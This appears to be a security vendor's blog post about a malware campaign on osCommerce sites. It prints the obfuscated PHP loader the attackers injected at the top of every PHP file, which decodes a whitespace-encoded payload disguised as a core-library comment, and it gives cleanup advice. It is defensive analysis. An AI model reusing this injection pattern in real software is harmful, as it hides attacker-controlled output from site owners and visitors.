osCommerce malware: Cannot redeclare corelibrarieshandler

We have been posting for a while about attacks targeting and infecting thousands of osCommerce sites (CreateCSS, div_colors, etc) and the importance of keeping it updated and secure.

If you think things have been improving, just for the last few days we started to see many of those osCommerce sites that were hacked, generating errors when trying to access them:

Fatal error: Cannot redeclare corelibrarieshandler() ..

And according to Google, there is probably about 10k pages with this type of error. So what is going on? It seems that the attackers tried to inject more malware into sites, but made a mistake and inserted the following at the top of every PHP file:

<?php /**
* Gets some core libraries and displays a top message if required. /*
*/ function CoreLibrariesHandler() { /*
*/ $session_keys = ‘; /*
*/ /*
*/ foreach(str_split($session_keys, 8 ) as $k=>$v) { /*
*/ $v = str_replace(‘ ‘, 1, str_replace(‘ ‘, 0, $v)); /*
*/ $session_keys[$k] = chr(bindec($v)); /*
*/ } /*
*/ /*
*/ if($session_keys) echo $session_keys; } /*
*/ register_shutdown_function(‘CoreLibrariesHandler’); /*
*/ /*
********************************************************************/

?>

Which instead of doing what they planned, caused all the sites to fail with this error “Fatal error: Cannot redeclare corelibrarieshandler() (previously declared in…”. Very annoying for both sides involved. To clean it up, you have to remove that piece of code from the top of every PHP file and properly secure osCommerce.

If you have an oscommerce site and it is hacked, our support team can clean it up for you. Sign up with us here: http://sucuri.net/signup and we will get it sorted out pretty quickly.